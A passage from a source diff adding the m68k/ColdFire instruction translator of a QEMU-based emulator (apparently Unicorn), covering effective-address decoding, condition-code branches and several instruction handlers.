*/ +static void gen_partset_reg(DisasContext *s, int opsize, TCGv reg, TCGv val) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + TCGv tmp; + switch (opsize) { + case OS_BYTE: + tcg_gen_andi_i32(tcg_ctx, reg, reg, 0xffffff00); + tmp = tcg_temp_new(tcg_ctx); + tcg_gen_ext8u_i32(tcg_ctx, tmp, val); + tcg_gen_or_i32(tcg_ctx, reg, reg, tmp); + break; + case OS_WORD: + tcg_gen_andi_i32(tcg_ctx, reg, reg, 0xffff0000); + tmp = tcg_temp_new(tcg_ctx); + tcg_gen_ext16u_i32(tcg_ctx, tmp, val); + tcg_gen_or_i32(tcg_ctx, reg, reg, tmp); + break; + case OS_LONG: + case OS_SINGLE: + tcg_gen_mov_i32(tcg_ctx, reg, val); + break; + default: + g_assert_not_reached(); + } +} + +/* Sign or zero extend a value. */ +static inline TCGv gen_extend(DisasContext *s, TCGv val, int opsize, int sign) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + TCGv tmp; + + switch (opsize) { + case OS_BYTE: + tmp = tcg_temp_new(tcg_ctx); + if (sign) + tcg_gen_ext8s_i32(tcg_ctx, tmp, val); + else + tcg_gen_ext8u_i32(tcg_ctx, tmp, val); + break; + case OS_WORD: + tmp = tcg_temp_new(tcg_ctx); + if (sign) + tcg_gen_ext16s_i32(tcg_ctx, tmp, val); + else + tcg_gen_ext16u_i32(tcg_ctx, tmp, val); + break; + case OS_LONG: + case OS_SINGLE: + tmp = val; + break; + default: + g_assert_not_reached(); + } + return tmp; +} + +/* Generate code for an "effective address". Does not adjust the base + register for autoincrement addressing modes. */ +static TCGv gen_lea(CPUM68KState *env, DisasContext *s, uint16_t insn, + int opsize) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + TCGv reg; + TCGv tmp; + uint16_t ext; + uint32_t offset; + + switch ((insn >> 3) & 7) { + case 0: /* Data register direct. */ + case 1: /* Address register direct. */ + return *(TCGv *)tcg_ctx->NULL_QREG; + case 2: /* Indirect register */ + case 3: /* Indirect postincrement. */ + return AREG(insn, 0); + case 4: /* Indirect predecrememnt. 
*/ + reg = AREG(insn, 0); + tmp = tcg_temp_new(tcg_ctx); + tcg_gen_subi_i32(tcg_ctx, tmp, reg, opsize_bytes(opsize)); + return tmp; + case 5: /* Indirect displacement. */ + reg = AREG(insn, 0); + tmp = tcg_temp_new(tcg_ctx); + ext = cpu_lduw_code(env, s->pc); + s->pc += 2; + tcg_gen_addi_i32(tcg_ctx, tmp, reg, (int16_t)ext); + return tmp; + case 6: /* Indirect index + displacement. */ + reg = AREG(insn, 0); + return gen_lea_indexed(env, s, opsize, reg); + case 7: /* Other */ + switch (insn & 7) { + case 0: /* Absolute short. */ + offset = cpu_ldsw_code(env, s->pc); + s->pc += 2; + return tcg_const_i32(tcg_ctx, offset); + case 1: /* Absolute long. */ + offset = read_im32(env, s); + return tcg_const_i32(tcg_ctx, offset); + case 2: /* pc displacement */ + offset = s->pc; + offset += cpu_ldsw_code(env, s->pc); + s->pc += 2; + return tcg_const_i32(tcg_ctx, offset); + case 3: /* pc index+displacement. */ + return gen_lea_indexed(env, s, opsize, *(TCGv *)tcg_ctx->NULL_QREG); + case 4: /* Immediate. */ + default: + return *(TCGv *)tcg_ctx->NULL_QREG; + } + } + /* Should never happen. */ + return *(TCGv *)tcg_ctx->NULL_QREG; +} + +/* Helper function for gen_ea. Reuse the computed address between the + for read/write operands. */ +static inline TCGv gen_ea_once(CPUM68KState *env, DisasContext *s, + uint16_t insn, int opsize, TCGv val, + TCGv *addrp, ea_what what) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + TCGv tmp; + + if (addrp && what == EA_STORE) { + tmp = *addrp; + } else { + tmp = gen_lea(env, s, insn, opsize); + if (IS_NULL_QREG(tmp)) + return tmp; + if (addrp) + *addrp = tmp; + } + return gen_ldst(s, opsize, tmp, val, what); +} + +/* Generate code to load/store a value from/into an EA. If VAL > 0 this is + a write otherwise it is a read (0 == sign extend, -1 == zero extend). + ADDRP is non-null for readwrite operands. 
*/ +static TCGv gen_ea(CPUM68KState *env, DisasContext *s, uint16_t insn, + int opsize, TCGv val, TCGv *addrp, ea_what what) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + TCGv reg; + TCGv result; + uint32_t offset; + + switch ((insn >> 3) & 7) { + case 0: /* Data register direct. */ + reg = DREG(insn, 0); + if (what == EA_STORE) { + gen_partset_reg(s, opsize, reg, val); + return *(TCGv *)tcg_ctx->store_dummy; + } else { + return gen_extend(s, reg, opsize, what == EA_LOADS); + } + case 1: /* Address register direct. */ + reg = AREG(insn, 0); + if (what == EA_STORE) { + tcg_gen_mov_i32(tcg_ctx, reg, val); + return *(TCGv *)tcg_ctx->store_dummy; + } else { + return gen_extend(s, reg, opsize, what == EA_LOADS); + } + case 2: /* Indirect register */ + reg = AREG(insn, 0); + return gen_ldst(s, opsize, reg, val, what); + case 3: /* Indirect postincrement. */ + reg = AREG(insn, 0); + result = gen_ldst(s, opsize, reg, val, what); + /* ??? This is not exception safe. The instruction may still + fault after this point. */ + if (what == EA_STORE || !addrp) + tcg_gen_addi_i32(tcg_ctx, reg, reg, opsize_bytes(opsize)); + return result; + case 4: /* Indirect predecrememnt. */ + { + TCGv tmp; + if (addrp && what == EA_STORE) { + tmp = *addrp; + } else { + tmp = gen_lea(env, s, insn, opsize); + if (IS_NULL_QREG(tmp)) + return tmp; + if (addrp) + *addrp = tmp; + } + result = gen_ldst(s, opsize, tmp, val, what); + /* ??? This is not exception safe. The instruction may still + fault after this point. */ + if (what == EA_STORE || !addrp) { + reg = AREG(insn, 0); + tcg_gen_mov_i32(tcg_ctx, reg, tmp); + } + } + return result; + case 5: /* Indirect displacement. */ + case 6: /* Indirect index + displacement. */ + return gen_ea_once(env, s, insn, opsize, val, addrp, what); + case 7: /* Other */ + switch (insn & 7) { + case 0: /* Absolute short. */ + case 1: /* Absolute long. */ + case 2: /* pc displacement */ + case 3: /* pc index+displacement. 
*/ + return gen_ea_once(env, s, insn, opsize, val, addrp, what); + case 4: /* Immediate. */ + /* Sign extend values for consistency. */ + switch (opsize) { + case OS_BYTE: + if (what == EA_LOADS) { + offset = cpu_ldsb_code(env, s->pc + 1); + } else { + offset = cpu_ldub_code(env, s->pc + 1); + } + s->pc += 2; + break; + case OS_WORD: + if (what == EA_LOADS) { + offset = cpu_ldsw_code(env, s->pc); + } else { + offset = cpu_lduw_code(env, s->pc); + } + s->pc += 2; + break; + case OS_LONG: + offset = read_im32(env, s); + break; + default: + // Should not happen : for OS_SIGNLE + return *(TCGv *)tcg_ctx->NULL_QREG; + } + return tcg_const_i32(tcg_ctx, offset); + default: + return *(TCGv *)tcg_ctx->NULL_QREG; + } + } + /* Should never happen. */ + return *(TCGv *)tcg_ctx->NULL_QREG; +} + +/* This generates a conditional branch, clobbering all temporaries. */ +static void gen_jmpcc(DisasContext *s, int cond, int l1) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + TCGv tmp; + + /* TODO: Optimize compare/branch pairs rather than always flushing + flag state to CC_OP_FLAGS. 
*/ + gen_flush_flags(s); + switch (cond) { + case 0: /* T */ + tcg_gen_br(tcg_ctx, l1); + break; + case 1: /* F */ + break; + case 2: /* HI (!C && !Z) */ + tmp = tcg_temp_new(tcg_ctx); + tcg_gen_andi_i32(tcg_ctx, tmp, *(TCGv *)tcg_ctx->QREG_CC_DEST, CCF_C | CCF_Z); + tcg_gen_brcondi_i32(tcg_ctx, TCG_COND_EQ, tmp, 0, l1); + break; + case 3: /* LS (C || Z) */ + tmp = tcg_temp_new(tcg_ctx); + tcg_gen_andi_i32(tcg_ctx, tmp, *(TCGv *)tcg_ctx->QREG_CC_DEST, CCF_C | CCF_Z); + tcg_gen_brcondi_i32(tcg_ctx, TCG_COND_NE, tmp, 0, l1); + break; + case 4: /* CC (!C) */ + tmp = tcg_temp_new(tcg_ctx); + tcg_gen_andi_i32(tcg_ctx, tmp, *(TCGv *)tcg_ctx->QREG_CC_DEST, CCF_C); + tcg_gen_brcondi_i32(tcg_ctx, TCG_COND_EQ, tmp, 0, l1); + break; + case 5: /* CS (C) */ + tmp = tcg_temp_new(tcg_ctx); + tcg_gen_andi_i32(tcg_ctx, tmp, *(TCGv *)tcg_ctx->QREG_CC_DEST, CCF_C); + tcg_gen_brcondi_i32(tcg_ctx, TCG_COND_NE, tmp, 0, l1); + break; + case 6: /* NE (!Z) */ + tmp = tcg_temp_new(tcg_ctx); + tcg_gen_andi_i32(tcg_ctx, tmp, *(TCGv *)tcg_ctx->QREG_CC_DEST, CCF_Z); + tcg_gen_brcondi_i32(tcg_ctx, TCG_COND_EQ, tmp, 0, l1); + break; + case 7: /* EQ (Z) */ + tmp = tcg_temp_new(tcg_ctx); + tcg_gen_andi_i32(tcg_ctx, tmp, *(TCGv *)tcg_ctx->QREG_CC_DEST, CCF_Z); + tcg_gen_brcondi_i32(tcg_ctx, TCG_COND_NE, tmp, 0, l1); + break; + case 8: /* VC (!V) */ + tmp = tcg_temp_new(tcg_ctx); + tcg_gen_andi_i32(tcg_ctx, tmp, *(TCGv *)tcg_ctx->QREG_CC_DEST, CCF_V); + tcg_gen_brcondi_i32(tcg_ctx, TCG_COND_EQ, tmp, 0, l1); + break; + case 9: /* VS (V) */ + tmp = tcg_temp_new(tcg_ctx); + tcg_gen_andi_i32(tcg_ctx, tmp, *(TCGv *)tcg_ctx->QREG_CC_DEST, CCF_V); + tcg_gen_brcondi_i32(tcg_ctx, TCG_COND_NE, tmp, 0, l1); + break; + case 10: /* PL (!N) */ + tmp = tcg_temp_new(tcg_ctx); + tcg_gen_andi_i32(tcg_ctx, tmp, *(TCGv *)tcg_ctx->QREG_CC_DEST, CCF_N); + tcg_gen_brcondi_i32(tcg_ctx, TCG_COND_EQ, tmp, 0, l1); + break; + case 11: /* MI (N) */ + tmp = tcg_temp_new(tcg_ctx); + tcg_gen_andi_i32(tcg_ctx, tmp, *(TCGv 
*)tcg_ctx->QREG_CC_DEST, CCF_N); + tcg_gen_brcondi_i32(tcg_ctx, TCG_COND_NE, tmp, 0, l1); + break; + case 12: /* GE (!(N ^ V)) */ + tmp = tcg_temp_new(tcg_ctx); + assert(CCF_V == (CCF_N >> 2)); + tcg_gen_shri_i32(tcg_ctx, tmp, *(TCGv *)tcg_ctx->QREG_CC_DEST, 2); + tcg_gen_xor_i32(tcg_ctx, tmp, tmp, *(TCGv *)tcg_ctx->QREG_CC_DEST); + tcg_gen_andi_i32(tcg_ctx, tmp, tmp, CCF_V); + tcg_gen_brcondi_i32(tcg_ctx, TCG_COND_EQ, tmp, 0, l1); + break; + case 13: /* LT (N ^ V) */ + tmp = tcg_temp_new(tcg_ctx); + assert(CCF_V == (CCF_N >> 2)); + tcg_gen_shri_i32(tcg_ctx, tmp, *(TCGv *)tcg_ctx->QREG_CC_DEST, 2); + tcg_gen_xor_i32(tcg_ctx, tmp, tmp, *(TCGv *)tcg_ctx->QREG_CC_DEST); + tcg_gen_andi_i32(tcg_ctx, tmp, tmp, CCF_V); + tcg_gen_brcondi_i32(tcg_ctx, TCG_COND_NE, tmp, 0, l1); + break; + case 14: /* GT (!(Z || (N ^ V))) */ + tmp = tcg_temp_new(tcg_ctx); + assert(CCF_V == (CCF_N >> 2)); + tcg_gen_andi_i32(tcg_ctx, tmp, *(TCGv *)tcg_ctx->QREG_CC_DEST, CCF_N); + tcg_gen_shri_i32(tcg_ctx, tmp, tmp, 2); + tcg_gen_xor_i32(tcg_ctx, tmp, tmp, *(TCGv *)tcg_ctx->QREG_CC_DEST); + tcg_gen_andi_i32(tcg_ctx, tmp, tmp, CCF_V | CCF_Z); + tcg_gen_brcondi_i32(tcg_ctx, TCG_COND_EQ, tmp, 0, l1); + break; + case 15: /* LE (Z || (N ^ V)) */ + tmp = tcg_temp_new(tcg_ctx); + assert(CCF_V == (CCF_N >> 2)); + tcg_gen_andi_i32(tcg_ctx, tmp, *(TCGv *)tcg_ctx->QREG_CC_DEST, CCF_N); + tcg_gen_shri_i32(tcg_ctx, tmp, tmp, 2); + tcg_gen_xor_i32(tcg_ctx, tmp, tmp, *(TCGv *)tcg_ctx->QREG_CC_DEST); + tcg_gen_andi_i32(tcg_ctx, tmp, tmp, CCF_V | CCF_Z); + tcg_gen_brcondi_i32(tcg_ctx, TCG_COND_NE, tmp, 0, l1); + break; + default: + /* Should ever happen. */ + abort(); + } +} + +DISAS_INSN(scc) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + int l1; + int cond; + TCGv reg; + + l1 = gen_new_label(tcg_ctx); + cond = (insn >> 8) & 0xf; + reg = DREG(insn, 0); + tcg_gen_andi_i32(tcg_ctx, reg, reg, 0xffffff00); + /* This is safe because we modify the reg directly, with no other values + live. 
*/ + gen_jmpcc(s, cond ^ 1, l1); + tcg_gen_ori_i32(tcg_ctx, reg, reg, 0xff); + gen_set_label(tcg_ctx, l1); +} + +/* Force a TB lookup after an instruction that changes the CPU state. */ +static void gen_lookup_tb(DisasContext *s) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + gen_flush_cc_op(s); + tcg_gen_movi_i32(tcg_ctx, *(TCGv *)tcg_ctx->QREG_PC, s->pc); + s->is_jmp = DISAS_UPDATE; +} + +/* Generate a jump to an immediate address. */ +static void gen_jmp_im(DisasContext *s, uint32_t dest) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + gen_flush_cc_op(s); + tcg_gen_movi_i32(tcg_ctx, *(TCGv *)tcg_ctx->QREG_PC, dest); + s->is_jmp = DISAS_JUMP; +} + +/* Generate a jump to the address in qreg DEST. */ +static void gen_jmp(DisasContext *s, TCGv dest) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + gen_flush_cc_op(s); + tcg_gen_mov_i32(tcg_ctx, *(TCGv *)tcg_ctx->QREG_PC, dest); + s->is_jmp = DISAS_JUMP; +} + +static void gen_exception(DisasContext *s, uint32_t where, int nr) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + gen_flush_cc_op(s); + gen_jmp_im(s, where); + gen_helper_raise_exception(tcg_ctx, tcg_ctx->cpu_env, tcg_const_i32(tcg_ctx, nr)); +} + +static inline void gen_addr_fault(DisasContext *s) +{ + gen_exception(s, s->insn_pc, EXCP_ADDRESS); +} + +#define SRC_EA(env, result, opsize, op_sign, addrp) do { \ + result = gen_ea(env, s, insn, opsize, *(TCGv *)tcg_ctx->NULL_QREG, addrp, \ + op_sign ? EA_LOADS : EA_LOADU); \ + if (IS_NULL_QREG(result)) { \ + gen_addr_fault(s); \ + return; \ + } \ + } while (0) + +#define DEST_EA(env, insn, opsize, val, addrp) do { \ + TCGv ea_result = gen_ea(env, s, insn, opsize, val, addrp, EA_STORE); \ + if (IS_NULL_QREG(ea_result)) { \ + gen_addr_fault(s); \ + return; \ + } \ + } while (0) + +/* Generate a jump to an immediate address. 
*/ +static void gen_jmp_tb(DisasContext *s, int n, uint32_t dest) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + TranslationBlock *tb; + + tb = s->tb; + if (unlikely(s->singlestep_enabled)) { + gen_exception(s, dest, EXCP_DEBUG); + } else if ((tb->pc & TARGET_PAGE_MASK) == (dest & TARGET_PAGE_MASK) || + (s->pc & TARGET_PAGE_MASK) == (dest & TARGET_PAGE_MASK)) { + tcg_gen_goto_tb(tcg_ctx, n); + tcg_gen_movi_i32(tcg_ctx, *(TCGv *)tcg_ctx->QREG_PC, dest); + tcg_gen_exit_tb(tcg_ctx, (uintptr_t)tb + n); + } else { + gen_jmp_im(s, dest); + tcg_gen_exit_tb(tcg_ctx, 0); + } + s->is_jmp = DISAS_TB_JUMP; +} + +DISAS_INSN(undef_mac) +{ + gen_exception(s, s->pc - 2, EXCP_LINEA); +} + +DISAS_INSN(undef_fpu) +{ + gen_exception(s, s->pc - 2, EXCP_LINEF); +} + +DISAS_INSN(undef) +{ + gen_exception(s, s->pc - 2, EXCP_UNSUPPORTED); +} + +DISAS_INSN(mulw) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + TCGv reg; + TCGv tmp; + TCGv src; + int sign; + + sign = (insn & 0x100) != 0; + reg = DREG(insn, 9); + tmp = tcg_temp_new(tcg_ctx); + if (sign) + tcg_gen_ext16s_i32(tcg_ctx, tmp, reg); + else + tcg_gen_ext16u_i32(tcg_ctx, tmp, reg); + SRC_EA(env, src, OS_WORD, sign, NULL); + tcg_gen_mul_i32(tcg_ctx, tmp, tmp, src); + tcg_gen_mov_i32(tcg_ctx, reg, tmp); + /* Unlike m68k, coldfire always clears the overflow bit. 
*/ + gen_logic_cc(s, tmp); +} + +DISAS_INSN(divw) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + TCGv reg; + TCGv tmp; + TCGv src; + int sign; + + sign = (insn & 0x100) != 0; + reg = DREG(insn, 9); + if (sign) { + tcg_gen_ext16s_i32(tcg_ctx, *(TCGv *)tcg_ctx->QREG_DIV1, reg); + } else { + tcg_gen_ext16u_i32(tcg_ctx, *(TCGv *)tcg_ctx->QREG_DIV1, reg); + } + SRC_EA(env, src, OS_WORD, sign, NULL); + tcg_gen_mov_i32(tcg_ctx, *(TCGv *)tcg_ctx->QREG_DIV2, src); + if (sign) { + gen_helper_divs(tcg_ctx, tcg_ctx->cpu_env, tcg_const_i32(tcg_ctx, 1)); + } else { + gen_helper_divu(tcg_ctx, tcg_ctx->cpu_env, tcg_const_i32(tcg_ctx, 1)); + } + + tmp = tcg_temp_new(tcg_ctx); + src = tcg_temp_new(tcg_ctx); + tcg_gen_ext16u_i32(tcg_ctx, tmp, *(TCGv *)tcg_ctx->QREG_DIV1); + tcg_gen_shli_i32(tcg_ctx, src, *(TCGv *)tcg_ctx->QREG_DIV2, 16); + tcg_gen_or_i32(tcg_ctx, reg, tmp, src); + s->cc_op = CC_OP_FLAGS; +} + +DISAS_INSN(divl) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + TCGv num; + TCGv den; + TCGv reg; + uint16_t ext; + + ext = cpu_lduw_code(env, s->pc); + s->pc += 2; + if (ext & 0x87f8) { + gen_exception(s, s->pc - 4, EXCP_UNSUPPORTED); + return; + } + num = DREG(ext, 12); + reg = DREG(ext, 0); + tcg_gen_mov_i32(tcg_ctx, *(TCGv *)tcg_ctx->QREG_DIV1, num); + SRC_EA(env, den, OS_LONG, 0, NULL); + tcg_gen_mov_i32(tcg_ctx, *(TCGv *)tcg_ctx->QREG_DIV2, den); + if (ext & 0x0800) { + gen_helper_divs(tcg_ctx, tcg_ctx->cpu_env, tcg_const_i32(tcg_ctx, 0)); + } else { + gen_helper_divu(tcg_ctx, tcg_ctx->cpu_env, tcg_const_i32(tcg_ctx, 0)); + } + if ((ext & 7) == ((ext >> 12) & 7)) { + /* div */ + tcg_gen_mov_i32 (tcg_ctx, reg, *(TCGv *)tcg_ctx->QREG_DIV1); + } else { + /* rem */ + tcg_gen_mov_i32 (tcg_ctx, reg, *(TCGv *)tcg_ctx->QREG_DIV2); + } + s->cc_op = CC_OP_FLAGS; +} + +DISAS_INSN(addsub) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + TCGv reg; + TCGv dest; + TCGv src; + TCGv tmp; + TCGv addr; + int add; + + add = (insn & 0x4000) != 0; + reg = DREG(insn, 9); + dest = tcg_temp_new(tcg_ctx); 
+ if (insn & 0x100) { + SRC_EA(env, tmp, OS_LONG, 0, &addr); + src = reg; + } else { + tmp = reg; + SRC_EA(env, src, OS_LONG, 0, NULL); + } + if (add) { + tcg_gen_add_i32(tcg_ctx, dest, tmp, src); + gen_helper_xflag_lt(tcg_ctx, *(TCGv *)tcg_ctx->QREG_CC_X, dest, src); + s->cc_op = CC_OP_ADD; + } else { + gen_helper_xflag_lt(tcg_ctx, *(TCGv *)tcg_ctx->QREG_CC_X, tmp, src); + tcg_gen_sub_i32(tcg_ctx, dest, tmp, src); + s->cc_op = CC_OP_SUB; + } + gen_update_cc_add(s, dest, src); + if (insn & 0x100) { + DEST_EA(env, insn, OS_LONG, dest, &addr); + } else { + tcg_gen_mov_i32(tcg_ctx, reg, dest); + } +} + + +/* Reverse the order of the bits in REG. */ +DISAS_INSN(bitrev) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + TCGv reg; + reg = DREG(insn, 0); + gen_helper_bitrev(tcg_ctx, reg, reg); +} + +DISAS_INSN(bitop_reg) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + int opsize; + int op; + TCGv src1; + TCGv src2; + TCGv tmp; + TCGv addr; + TCGv dest; + + if ((insn & 0x38) != 0) + opsize = OS_BYTE; + else + opsize = OS_LONG; + op = (insn >> 6) & 3; + SRC_EA(env, src1, opsize, 0, op ? &addr: NULL); + src2 = DREG(insn, 9); + dest = tcg_temp_new(tcg_ctx); + + gen_flush_flags(s); + tmp = tcg_temp_new(tcg_ctx); + if (opsize == OS_BYTE) + tcg_gen_andi_i32(tcg_ctx, tmp, src2, 7); + else + tcg_gen_andi_i32(tcg_ctx, tmp, src2, 31); + src2 = tmp; + tmp = tcg_temp_new(tcg_ctx); + tcg_gen_shr_i32(tcg_ctx, tmp, src1, src2); + tcg_gen_andi_i32(tcg_ctx, tmp, tmp, 1); + tcg_gen_shli_i32(tcg_ctx, tmp, tmp, 2); + /* Clear CCF_Z if bit set. 
*/ + tcg_gen_ori_i32(tcg_ctx, *(TCGv *)tcg_ctx->QREG_CC_DEST, *(TCGv *)tcg_ctx->QREG_CC_DEST, CCF_Z); + tcg_gen_xor_i32(tcg_ctx, *(TCGv *)tcg_ctx->QREG_CC_DEST, *(TCGv *)tcg_ctx->QREG_CC_DEST, tmp); + + tcg_gen_shl_i32(tcg_ctx, tmp, tcg_const_i32(tcg_ctx, 1), src2); + switch (op) { + case 1: /* bchg */ + tcg_gen_xor_i32(tcg_ctx, dest, src1, tmp); + break; + case 2: /* bclr */ + tcg_gen_not_i32(tcg_ctx, tmp, tmp); + tcg_gen_and_i32(tcg_ctx, dest, src1, tmp); + break; + case 3: /* bset */ + tcg_gen_or_i32(tcg_ctx, dest, src1, tmp); + break; + default: /* btst */ + break; + } + if (op) + DEST_EA(env, insn, opsize, dest, &addr); +} + +DISAS_INSN(sats) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + TCGv reg; + reg = DREG(insn, 0); + gen_flush_flags(s); + gen_helper_sats(tcg_ctx, reg, reg, *(TCGv *)tcg_ctx->QREG_CC_DEST); + gen_logic_cc(s, reg); +} + +static void gen_push(DisasContext *s, TCGv val) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + TCGv tmp; + + tmp = tcg_temp_new(tcg_ctx); + tcg_gen_subi_i32(tcg_ctx, tmp, QREG_SP, 4); + gen_store(s, OS_LONG, tmp, val); + tcg_gen_mov_i32(tcg_ctx, QREG_SP, tmp); +} + +DISAS_INSN(movem) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + TCGv addr; + int i; + uint16_t mask; + TCGv reg; + TCGv tmp; + int is_load; + + mask = cpu_lduw_code(env, s->pc); + s->pc += 2; + tmp = gen_lea(env, s, insn, OS_LONG); + if (IS_NULL_QREG(tmp)) { + gen_addr_fault(s); + return; + } + addr = tcg_temp_new(tcg_ctx); + tcg_gen_mov_i32(tcg_ctx, addr, tmp); + is_load = ((insn & 0x0400) != 0); + for (i = 0; i < 16; i++, mask >>= 1) { + if (mask & 1) { + if (i < 8) + reg = DREG(i, 0); + else + reg = AREG(i, 0); + if (is_load) { + tmp = gen_load(s, OS_LONG, addr, 0); + tcg_gen_mov_i32(tcg_ctx, reg, tmp); + } else { + gen_store(s, OS_LONG, addr, reg); + } + if (mask != 1) + tcg_gen_addi_i32(tcg_ctx, addr, addr, 4); + } + } +} + +DISAS_INSN(bitop_im) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + int opsize; + int op; + TCGv src1; + uint32_t mask; + int bitnum; + TCGv 
tmp; + TCGv addr; + + if ((insn & 0x38) != 0) + opsize = OS_BYTE; + else + opsize = OS_LONG; + op = (insn >> 6) & 3; + + bitnum = cpu_lduw_code(env, s->pc); + s->pc += 2; + if (bitnum & 0xff00) { + disas_undef(env, s, insn); + return; + } + + SRC_EA(env, src1, opsize, 0, op ? &addr: NULL); + + gen_flush_flags(s); + if (opsize == OS_BYTE) + bitnum &= 7; + else + bitnum &= 31; + mask = 1U << bitnum; + + tmp = tcg_temp_new(tcg_ctx); + assert (CCF_Z == (1 << 2)); + if (bitnum > 2) + tcg_gen_shri_i32(tcg_ctx, tmp, src1, bitnum - 2); + else if (bitnum < 2) + tcg_gen_shli_i32(tcg_ctx, tmp, src1, 2 - bitnum); + else + tcg_gen_mov_i32(tcg_ctx, tmp, src1); + tcg_gen_andi_i32(tcg_ctx, tmp, tmp, CCF_Z); + /* Clear CCF_Z if bit set. */ + tcg_gen_ori_i32(tcg_ctx, *(TCGv *)tcg_ctx->QREG_CC_DEST, *(TCGv *)tcg_ctx->QREG_CC_DEST, CCF_Z); + tcg_gen_xor_i32(tcg_ctx, *(TCGv *)tcg_ctx->QREG_CC_DEST, *(TCGv *)tcg_ctx->QREG_CC_DEST, tmp); + if (op) { + switch (op) { + case 1: /* bchg */ + tcg_gen_xori_i32(tcg_ctx, tmp, src1, mask); + break; + case 2: /* bclr */ + tcg_gen_andi_i32(tcg_ctx, tmp, src1, ~mask); + break; + case 3: /* bset */ + tcg_gen_ori_i32(tcg_ctx, tmp, src1, mask); + break; + default: /* btst */ + break; + } + DEST_EA(env, insn, opsize, tmp, &addr); + } +} + +DISAS_INSN(arith_im) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + int op; + uint32_t im; + TCGv src1; + TCGv dest; + TCGv addr; + + op = (insn >> 9) & 7; + SRC_EA(env, src1, OS_LONG, 0, (op == 6) ? 
NULL : &addr); + im = read_im32(env, s); + dest = tcg_temp_new(tcg_ctx); + switch (op) { + case 0: /* ori */ + tcg_gen_ori_i32(tcg_ctx, dest, src1, im); + gen_logic_cc(s, dest); + break; + case 1: /* andi */ + tcg_gen_andi_i32(tcg_ctx, dest, src1, im); + gen_logic_cc(s, dest); + break; + case 2: /* subi */ + tcg_gen_mov_i32(tcg_ctx, dest, src1); + gen_helper_xflag_lt(tcg_ctx, *(TCGv *)tcg_ctx->QREG_CC_X, dest, tcg_const_i32(tcg_ctx, im)); + tcg_gen_subi_i32(tcg_ctx, dest, dest, im); + gen_update_cc_add(s, dest, tcg_const_i32(tcg_ctx, im)); + s->cc_op = CC_OP_SUB; + break; + case 3: /* addi */ + tcg_gen_mov_i32(tcg_ctx, dest, src1); + tcg_gen_addi_i32(tcg_ctx, dest, dest, im); + gen_update_cc_add(s, dest, tcg_const_i32(tcg_ctx, im)); + gen_helper_xflag_lt(tcg_ctx, *(TCGv *)tcg_ctx->QREG_CC_X, dest, tcg_const_i32(tcg_ctx, im)); + s->cc_op = CC_OP_ADD; + break; + case 5: /* eori */ + tcg_gen_xori_i32(tcg_ctx, dest, src1, im); + gen_logic_cc(s, dest); + break; + case 6: /* cmpi */ + tcg_gen_mov_i32(tcg_ctx, dest, src1); + tcg_gen_subi_i32(tcg_ctx, dest, dest, im); + gen_update_cc_add(s, dest, tcg_const_i32(tcg_ctx, im)); + s->cc_op = CC_OP_SUB; + break; + default: + abort(); + } + if (op != 6) { + DEST_EA(env, insn, OS_LONG, dest, &addr); + } +} + +DISAS_INSN(byterev) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + TCGv reg; + + reg = DREG(insn, 0); + tcg_gen_bswap32_i32(tcg_ctx, reg, reg); +} + +DISAS_INSN(move) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + TCGv src; + TCGv dest; + int op; + int opsize; + + switch (insn >> 12) { + case 1: /* move.b */ + opsize = OS_BYTE; + break; + case 2: /* move.l */ + opsize = OS_LONG; + break; + case 3: /* move.w */ + opsize = OS_WORD; + break; + default: + abort(); + } + SRC_EA(env, src, opsize, 1, NULL); + op = (insn >> 6) & 7; + if (op == 1) { + /* movea */ + /* The value will already have been sign extended. 
*/ + dest = AREG(insn, 9); + tcg_gen_mov_i32(tcg_ctx, dest, src); + } else { + /* normal move */ + uint16_t dest_ea; + dest_ea = ((insn >> 9) & 7) | (op << 3); + DEST_EA(env, dest_ea, opsize, src, NULL); + /* This will be correct because loads sign extend. */ + gen_logic_cc(s, src); + } +} + +DISAS_INSN(negx) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + TCGv reg; + + gen_flush_flags(s); + reg = DREG(insn, 0); + gen_helper_subx_cc(tcg_ctx, reg, tcg_ctx->cpu_env, tcg_const_i32(tcg_ctx, 0), reg); +} + +DISAS_INSN(lea) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + TCGv reg; + TCGv tmp; + + reg = AREG(insn, 9); + tmp = gen_lea(env, s, insn, OS_LONG); + if (IS_NULL_QREG(tmp)) { + gen_addr_fault(s); + return; + } + tcg_gen_mov_i32(tcg_ctx, reg, tmp); +} + +DISAS_INSN(clr) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + int opsize; + + switch ((insn >> 6) & 3) { + case 0: /* clr.b */ + opsize = OS_BYTE; + break; + case 1: /* clr.w */ + opsize = OS_WORD; + break; + case 2: /* clr.l */ + opsize = OS_LONG; + break; + default: + abort(); + } + DEST_EA(env, insn, opsize, tcg_const_i32(tcg_ctx, 0), NULL); + gen_logic_cc(s, tcg_const_i32(tcg_ctx, 0)); +} + +static TCGv gen_get_ccr(DisasContext *s) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + TCGv dest; + + gen_flush_flags(s); + dest = tcg_temp_new(tcg_ctx); + 